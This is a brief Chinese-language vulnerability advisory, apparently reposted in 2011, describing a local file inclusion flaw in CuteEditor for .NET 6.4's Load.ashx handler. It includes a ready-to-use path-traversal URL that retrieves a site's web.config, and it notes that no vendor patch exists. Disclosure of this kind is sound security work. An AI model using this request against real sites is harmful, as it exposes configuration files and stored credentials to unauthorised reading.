Cute Editor在线编辑器中本地包含漏洞

2011-3-24 18:17:32 来源:网络转载 浏览:203
Cute Editor在线编辑器中本地包含漏洞
出现版本:CuteEditor For Net 6.4

程序介绍:CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。

漏洞分析: 在 Load.ashx 文件中未对file参数进行处理,可以加载任意文件。

漏洞利用: http://www.target.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

解决方案:
开发厂商:CuteSoft.net
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://cutesoft.net/
(0)
(0)